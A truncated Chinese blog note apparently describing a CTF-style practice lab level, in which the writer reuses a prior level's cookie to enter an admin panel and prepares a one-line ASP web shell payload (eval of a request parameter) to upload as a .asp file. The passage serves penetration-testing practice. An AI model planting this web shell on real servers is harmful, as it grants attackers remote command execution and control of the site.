mbp 封神臺靶場 五 (筆記)

打開鏈接,發現需要使用上一關的cookie,刪除flag並複製放入modheader中即可。 或者用burp抓包替換cookie都可以,登錄進去顯示管理系統界面。 看了題目的提示,需要上傳腳本上去,搞到它的後臺。點開各個頁面,發現裏面有可以上傳的地方。 便準備寫一個一句話木馬上傳試一試,新建一個1.txt文件,輸入<% eval request('mac') %>即可,並將後綴名改爲1.asp,選
相關文章
相關標籤/搜索